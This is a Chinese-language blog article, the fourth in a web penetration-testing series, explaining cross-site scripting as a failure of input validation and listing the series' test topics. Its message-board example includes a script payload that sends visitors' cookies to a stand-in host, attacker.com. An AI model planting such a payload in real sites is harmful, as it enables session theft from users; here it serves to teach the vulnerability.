查看原文
其他

再说Web渗透测试(第四集)

再说安全 再说安全
2024-12-01
前言
XSS从理解到深入剖析,十五项最佳XSS攻击实践以及对应防御经验详解

本文章阅读大约需要15分钟;

第四集,框架内容-XSS漏洞;

Web渗透测试框架内容

编号 名称
描述
检查项
1信息收集子域名接管15项
越权(IDOR)
15项
  2Word PressCMS 安全
15项
  3HTTP头
识别缺失或配置错误的安全头信息
25项

4

注入攻击

XSS15项
SQL Injection

  5文件上传尝试绕过安全机制上传恶意文件

    

  6

SSRF
利用漏洞欺骗服务器端应用程序向内部网络或其他系统发送请求,获取敏感信息或进行攻击。

   

  7

WAF测试WAF的有效性,包括其检测和阻止恶意流量的能力,以及绕过WAF的潜在方法。

1.从理解到深入剖析:XSS攻击,Web 安全的“顽疾”

XSS (Cross-Site Scripting),跨站脚本攻击,是一种常见的 Web 安全漏洞。攻击者将恶意代码注入到网页中,当用户访问该网页时,恶意代码就会在用户的浏览器中执行,从而盗取用户信息、控制用户行为,甚至传播恶意软件。

1.1 XSS 攻击的本质:错位的信任

XSS 攻击之所以能够成功,其根本原因在于 Web 应用程序对用户输入的 “错位信任” 。它们错误地认为所有用户输入的内容都是安全的,从而放松了警惕,给了攻击者可乘之机。

常见的XSS漏洞成因:

1.1.1 输入验证的缺失:自由的“入口”

很多 Web 应用没有对用户输入的内容进行严格的验证,就像一个没有门卫的大门,任何人都可以随意进出。攻击者可以利用这个“自由的入口”,将恶意代码注入到网站中。

例如,一个留言板应用允许用户输入 HTML 标签,攻击者就可以在留言中插入 <script> 标签,嵌入恶意 JavaScript 代码:

<script>// 窃取用户 Cookie 信息document.location = 'https://attacker.com/steal_cookie.php?cookie=' + document.cookie;</script>                                                       Html 

当其他用户访问留言板时,这段恶意代码就会在他们的浏览器中执行,导致 Cookie 信息被盗取。

个人观点,仅供参考
继续滑动看下一个
再说安全
向上滑动看下一个

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存